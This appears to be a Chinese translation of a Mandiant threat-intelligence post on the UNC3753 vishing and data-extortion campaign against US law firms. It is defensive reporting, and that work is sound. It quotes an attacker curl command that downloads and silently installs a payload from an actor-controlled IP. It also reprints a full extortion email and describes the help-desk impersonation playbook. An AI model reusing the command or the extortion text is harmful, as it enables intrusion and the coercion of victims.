Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

针对美国律师事务所的持续定向攻击 | Google Cloud 博客

威胁情报

寻求建议：针对美国律师事务所的持续定向攻击

2026 年 6 月 6 日

##### Mandiant

##### Google 威胁情报小组

##### Mandiant 服务

阻止攻击，降低风险，提升您的安全防护。

联系 Mandiant

作者：Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan

介绍

2026 年 1 月至 5 月期间，Mandiant 识别出一个由威胁集群 UNC3753（也被称为“Luna Moth”、“Chatty Spider”和“Silent Ransom Group”）实施的、以财务动机为目标的数据窃取勒索活动，该活动针对美国多个专业、法律和金融服务组织。

UNC3753 利用语音钓鱼（vishing）和社会工程欺骗技术，实现对企业的远程访问。通过数据迁移或与发票相关的电子邮件等借口，威胁行为者发起电话对话，伪装成 IT 支持人员，说服目标进行屏幕共享会话并下载远程监控和管理（RMM）工具。一旦进入环境，威胁行为者要么直接进行搜索，以定位并窃取高度敏感的数据，要么操纵受害者代表他们执行这些操作。这些数据通常包括专有的法律协议、个人可识别信息（PII）以及财务记录，用于后续的勒索要求。

值得注意的是，在可能与 UNC3753 相关的实例中，威胁行为者曾亲自访问受害者的系统。在这些物理事件中，伪装成 IT 技术人员的个人进入公司办公室，试图通过 USB 存储介质直接从终端设备窃取数据。

本文详细介绍了威胁组织在近期 Mandiant 咨询事件响应中的技术生命周期，突出了物理办公室目标等战术，并提供了保护终端和基础设施的实际建议。

威胁详情

UNC3753 活动生命周期反映了优化且节奏快速的操作模型。在许多 Mandiant 调查的事件中，从首次接触目标到数据窃取和勒索的整个攻击序列，都在一天之内完成。最近，Mandiant 观察到数据搜索、准备和窃取在不到一小时内开始。

该威胁组织经常通过从行为者控制的消费者电子邮件账户发送的良性、以发票为主题的电子邮件诱饵来启动活动。这些邮件中没有活动链接或恶意附件。相反，它们通常包含简短的通用信息，例如：“你好，这是昨天我们谈到的发票”。Google 威胁情报小组（GTIG）评估认为，这些邮件的主要目的是建立一个借口，提高目标的内部安全担忧，使他们更容易受到后续的语音电话攻击。

图 1：UNC3753 攻击生命周期

#### 通过伪装 IT 帮助台进行初始访问

UNC3753 进入机制的核心依赖于定向语音钓鱼。Mandiant 观察到该组织针对所有级别的员工，这些员工通常在组织的网站上公开列出，以获取电话号码和电子邮件地址。威胁行为者伪装成组织内部 IT 帮助台或安全团队的成员，直接致电这些员工。

攻击者使用各种口头指令来引导目标的行为。在以解决安全问题或协助企业数据迁移项目为借口时，他们建立信任，并引导目标加入屏幕共享会话。

#### 远程屏幕控制与合法工具滥用

一旦目标被吸引，威胁行为者会通过指导用户下载并执行屏幕共享应用程序，绕过传统的自动化边界安全和电子邮件过滤控制。

##### 屏幕共享工具

UNC3753 指导目标使用内置或商业服务（包括 Zoom、Microsoft Terminal Services、Microsoft Teams 和 Quick Assist）启动远程桌面和支持会话。在一次由 Teams 协助的入侵中，威胁行为者在三天内与同一目标进行了五次不同的通话。

##### 商业 RMM 代理

UNC3753 经常通过社会工程手段诱使目标下载 AnyDesk、Bomgar 或 Zoho Assist 安装程序，以尝试建立更持久的访问权限。在一次互动中，威胁行为者通过说服目标通过 cURL 命令下载并执行有效载荷，尝试安装“SuperOps RMM 代理”。

##### 通过 Privnote 发送消息

威胁行为者持续使用 privnote[.]com，这是一个基于网络的、自毁式文本工具，向目标发送安装链接和命令。这种规避技术确保复制粘贴向量不会在终端浏览器或聊天记录中留下任何永久痕迹。

在 UNC3753 远程会话中观察到的示例 cURL 命令字符串如下：

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

#### 基础设施跳转与本地部署

入侵行为利用了自带设备（BYOD）的远程环境，以访问内部企业资产。在 Mandiant Consulting 的多个案例中，UNC3753 直接在目标的个人 BYOD 终端上建立了 Zoom 会话。利用这些被入侵的个人笔记本电脑，他们使用原生客户端平台（如 Windows 365（Windows365.exe）或 Citrix 客户端）访问企业虚拟桌面基础设施（VDI）。

一旦获得 VDI 环境的访问权限，威胁行为者就会转向企业文件系统：

• 系统枚举：威胁行为者映射本地目录，枚举活动的 OneDrive 文件夹，并爬取映射的网络驱动器。

• 文档管理目标收割：威胁行为者针对特定的法律和文档存储库。

• 关键词搜索与文件部署：威胁行为者使用 iManage 中的特定关键词搜索功能，定位包含税务记录（表格 W-2、W-9 和 1099）、审计文件、企业客户协议和社会保障号码（SSNs）的高敏感文件夹。部署后的结果会在目标可访问的子目录中进行整理和排序，主要位于用户的下载文件夹或原生漫游配置文件路径中。

数据窃取

UNC3753 使用多种方法将部署后的数据外泄，以绕过安全控制。他们经常使用 WinSCP 或 Rclone 的便携版本。在其他情况下，他们只需直接在受害者的网络浏览器中登录到威胁行为者控制的消费者文件共享账户，并批量上传被盗文件。

• 云存储中转：威胁行为者指示目标——或直接控制其屏幕——将已分阶段的文件夹拖拽并投放到由威胁行为者控制的消费者文件共享账户中。在几次入侵事件中，数据外泄的目标文件夹被明确重命名，以模仿受害组织的品牌标识。

• FTP 工具：当基于浏览器的上传受到终端控制限制时，威胁行为者会下载 FTP 和 SFTP 客户端二进制文件，主要是 WinSCP，以外泄批量数据包。在一次事件中，威胁组织从目标本地的 OneDrive 文件夹中外泄了 1.7GB 的数据到 Google Drive 账户，随后切换到 VDI 会话，并使用 WinSCP 外泄了额外的 14.4GB 数据。Google 已针对该行为者采取行动，通过禁用与该活动相关的 Drive 账户和资产。

• 邮件转发：威胁行为者还让受害者从内部 iManage 仓库中准备文件，并指示他们从目标的邮箱发送文件到威胁行为者控制的消费者电子邮件地址。

威胁行为者的勒索手段

该威胁集群在成功窃取数据后，通常在离开目标环境后不到 30 分钟内，通过电子邮件发送未品牌化的勒索信息。

这些极具攻击性的勒索信给组织设定了三天的回应期限，并启动赎金谈判。如果受害组织没有回应，威胁行为者会声称将直接致电并邮件联系目标员工和外部客户，告知他们数据泄露的情况。勒索信明确强调，泄露将损害客户信任、招致大量监管罚款，并建议外部客户因数据处理不当而起诉受害组织。此外，作为后续信息的一部分，该组织威胁要将所有外泄的归档文件发布在 LEAKEDDATA 数据泄露网站（DLS）上。

#### 勒索邮件示例

主题：[受害者名称]已丢失其客户的机密数据。非常重要！

你好，

我们必须通知你，我们已经获得了 [受害者名称] 公司的数据库访问权限，并获取了大量数据集。我们已经在你的网络中停留了数周，涉及多个系统，目标是获取专有和机密文件，并成功获取了我们所寻找的数据以及许多客户的资料。<提及被盗文件的一般性质>。这不是玩笑或骗局。

这是一个真实的问题，它危及你公司的存在，为了证明这一点，我们已附上确认我们拥有这些文件的截图。

回复我们的电子邮件，我们将向你展示完整的文件树和实际文件。

我们是一个精英团体，从事这个行业已有很长时间，我们有自己的网站，会在上面发布数据，有成千上万的人关注我们的工作，并在不同的商业社交媒体上有联系。但更重要的是，我们希望和平且尽快地归还你的数据。

我们将保证从我们的服务器上完全删除数据库，提供我们删除文件的视频证据，保证我们之间的通信隐私，并提供我们的安全建议，解释我们是如何进入你的网络以及如何修复我们发现的漏洞。

为了解决这个问题，你需要发送电子邮件并开始与我们沟通。我们希望找到一个双方都能接受的财务解决方案。

如果忽视或没有达成协议，我们将通知您的员工、合作伙伴和客户，之后我们将公开您的数据。您将面临个人和法律实体对信息泄露和违反合同的索赔，您目前的交易也将被终止。记者和其他人将深入研究您的文件，发现其中的不一致或违规之处。您的组织将失去声誉，股价将下跌，您的组织将被迫关闭。

请记住，如果我们将数据泄露，您的数据还可能被其他许多黑客和犯罪分子在暗网使用，以及您的竞争对手和敌人。

执法部门不会帮助您，我们已超出他们的管辖范围，并且我们已经获取了所有关键数据。他们只会告诉您不要与我们联系，并且会率先对您进行罚款。

一旦您联系我们，我们将向您展示我们获取的所有文件，这样您就能理解这个问题的严重性以及进行谈判的必要性。

在协议前后，我们的沟通将保持100%的私密性。我们也可以展示相关的证明。

所有进一步的沟通都可以通过此电子邮件地址进行。

不要浪费任何时间，因为时间正在流逝。今天就与我们联系，这样我们就不必在明天开始联系您的员工。您将有3天的时间开始沟通。

我们在此附上一些截图，以确认上述所有内容。回复此电子邮件，我们将发送给您文件树。

图2：UNC3753勒索便条示例

数据泄露网站

图3：LEAKEDDATA DLS（部分已删除；已裁剪）

#### 涉及物理访问的疑似UNC3753活动

虽然UNC3753主要依赖于数字手段，但GTIG评估认为，相关威胁行为者也尝试通过物理、当面访问的方式直接窃取数据。这种升级的策略得到了最近FBI网络FLASH警报的支持，该警报提到了一些实例，其中Silent Ransom Group威胁行为者利用对办公室的物理访问，通过可移动的USB媒体设备将企业数据外泄。

根据FBI的建议，如果远程社会工程尝试失败，行为者将派一名人员前往受害者的物理位置。现场的威胁行为者将声称他们需要对设备进行成像或创建本地备份，以解决安全问题。一旦他们获得终端访问权限，他们将尝试直接将企业数据外泄到外部驱动器中。

尽管有限的法医证据和随后没有勒索尝试阻止了正式归因，但GTIG评估认为，这些物理入侵很可能是与UNC3753相关的，这是基于结构、时间线和目标重叠的。

归因

GTIG 将此次活动及相关社会工程操作归因于 UNC3753，依据包括基础设施重叠、域名注册商追踪、受害者特征分析以及目标阶段目录等信息。UNC3753（别名：“Luna Moth”、“Chatty Spider”和“Silent Ransom Group (SRG)”) 是一个以经济利益为动机的威胁集群，自至少2022年3月起活跃。UNC3753 的战术和技术与 UNC2686 存在重叠，后者是一个自2021年初以来开展类似“Bazarcall”活动的威胁集群。UNC3753 在2022年部署了 LOCKBIT.BLACK，但此后优先进行仅以数据窃取勒索为特点的操作，通常涉及威胁将被盗文件发布到 LEAKEDDATA DLS。该威胁集群高度依赖远程监控与管理（RMM）工具，与部署了 BAZARLOADER 变种以及 TRICKBOT、URSNIF 和 SILENTNIGHT 的 UNC2686 不同。最初，UNC3753 使用以订阅为主题的账单电子邮件诱饵（例如虚假的软件续费提醒），通常附带包含由攻击者控制的呼叫中心电话号码的 PDF 文件。自2025年3月左右开始，该集群改变了策略，伪装成公司内部的IT帮助台人员。

缓解与加固

为降低语音钓鱼、物理办公室入侵和未经授权的终端控制风险，GTIG 建议组织实施以下缓解控制措施：

#### 用户教育

开展专门针对 UNC3753 战术、技术和程序的用户意识培训。

#### 物理访问与验证政策

对所有外部承包商、技术人员和设施访客实施严格的非带外身份验证控制。强制执行以下物理控制措施：

• 要求访客出示官方凭证和照片身份证明。

• 要求前台人员在允许访问之前复制并记录所有物理访客的ID。

• 直接与已验证的母公司或帮助台调度员核对所有技术人员的到达情况，与预先安排的工作订单进行比对。

• 强制执行一项政策，要求所有物理技术人员在任何时候都必须由公司主管陪同。

#### 远程访问条件访问控制

实施远程访问条件访问策略，确保只有公司拥有的设备才能认证到虚拟桌面实例（VDI）或虚拟私人网络（VPN）设备。这有助于提高组织对潜在远程监控和管理使用的控制和可见性。

#### 强制实施严格的 RMM 和屏幕共享软件控制

审查公司环境，阻止未经授权的远程监控、管理和支持工具的安装和执行。强制执行应用程序控制策略（例如 Windows Defender 应用程序控制或第三方端点保护工具），以限制非批准二进制文件的执行。组织还可以考虑限制授权虚拟会议平台（如 Zoom 和 Teams）中的交互式屏幕控制功能。

#### 终端可移动媒体加固

为中和物理数据外泄途径，禁用所有外部USB大容量存储设备的读写功能。强制实施组策略对象（GPO）或移动设备管理（MDM）配置，以限制以下内容：

• USB存储设备的安装。

• 可移动媒体的访问。

• 所有公司终端和使用VDI入口的BYOD系统上的光盘写入操作。

#### 网络监控与出站控制

监控防火墙日志、网络流量和终端执行日志，以发现数据外泄和阶段行动的迹象。具体包括：

• 阻止或对连接到未授权文件共享API和电子邮件的出站连接发出警报。

• 在防火墙日志配置中启用完整的会话日志记录，并记录传输的字节数。

• 监控来自内部VDI和终端的SSH流量（端口22），以检测大量WinSCP和Rclone传输。

#### 应用日志和访问审计

审查关键文档存储的认证和访问指标，以识别批量收集的模式。

• 在iManage、SharePoint和企业电子邮件目录中配置实时警报，以快速检测文件搜索、搜索词激增和批量文件下载。

• 在业务关键数据存储应用（如iManage）上实施多因素认证（MFA）。

• 实施严格的BYOD认证控制，当访问VDI节点时，要求进行MFA增强查询。

展望与影响

由财务动机驱动的攻击者持续针对美国法律和专业服务组织，这是行业中的持续性风险。法律服务公司是勒索攻击者的重要目标，它们保存着高度敏感的客户交易文件、并购计划、客户商业秘密和公司监管报告。威胁组织认识到法律实体面临严重的声誉和监管风险，可能非常有动机秘密解决勒索情况以保护其专业声誉。

威胁攻击者认识到，针对人为因素，特别是使用语音引导的社会工程学，使他们能够轻松绕过强大的技术边界、网络安全部门和MFA配置。

最后，将面对面的实体入侵整合进来，代表了威胁能力的升级。虽然基于日志的防御和终端遥测技术已经成熟，但实体公司的边界通常仅通过行政程序进行保护。组织必须转向统一的安全态势，将实体设施的访问控制和基于终端的硬件策略视为防御边界同等重要的组成部分。

数据泄露网站（DLS）

UNC3753使用以下网络平台来披露受害者的身份及其被泄露的数据。

• hxxps[:]//business-data-leaks[.]com

钓鱼域名

GTIG识别出疑似UNC3753攻击者注册的基础设施，这些攻击者使用特定的命名约定，这些命名约定被评估为支持他们的社会工程和语音钓鱼活动。

• <organization>-itdesk[.]com

• <organization>-it[.]com

• <organization>-helpdesk[.]com

感染指标（IOCs）

为了帮助更广泛的社区追踪和识别本文中提到的活动，我们在GTI集合中为注册用户包含了感染指标（IOCs）。

IOCs类型

指标

IPv4地址

192.236.147.131

192.236.147.138

193.141.60.212

192.236.154.158

192.236.146.173

174.169.162.62

64.94.84.97

Google 安全运营（SecOps）

Google SecOps 客户可以访问 Mandiant Intel Emerging Threats 规则包中的这些广泛类别规则和其他规则。本文中讨论的活动在 Google SecOps 中通过以下规则名称检测到：

• 执行通过 Curl 下载的 MSI 文件

• 可疑的 Rclone 数据外泄

MITRE ATT&CK

战术

技术ID

技术名称

初始访问

T1566.004

钓鱼：针对性语音钓鱼

T1133

外部远程服务

执行

T1204.002

用户执行：恶意文件

T1059.001

命令和脚本解释器：PowerShell

T1059.003

命令和脚本解释器：Windows 命令行外壳

T1569.002

系统服务：服务执行

持久化

T1053.005

计划任务/作业：计划任务

T1547.001

启动或登录自动启动执行：注册表运行键

防御规避

T1036.005

伪装：匹配合法名称或位置

T1553.002

破坏信任控制：代码签名

T1562.001

削弱防御：禁用或修改工具

T1070.001

指示器清除：清除 Windows 事件日志

凭证访问

T1003.001

操作系统凭证转储：LSASS 内存

T1003.002

操作系统凭证转储：安全账户管理器

发现

T1083

文件和目录发现

T1135

网络共享发现

T1046

网络服务发现

横向移动

T1219

远程访问软件

T1021.001

远程服务：远程桌面协议

T1021.004

远程服务：SSH

收集

T1005

来自本地系统的数据

命令与控制

T1572

协议隧道

数据外泄

T1020

自动外泄

T1567.002

通过 Web 服务外泄：外泄到云存储

T1052.001

通过物理媒介外泄

影响

T1486

为了造成影响而加密数据

发布于

• 威胁情报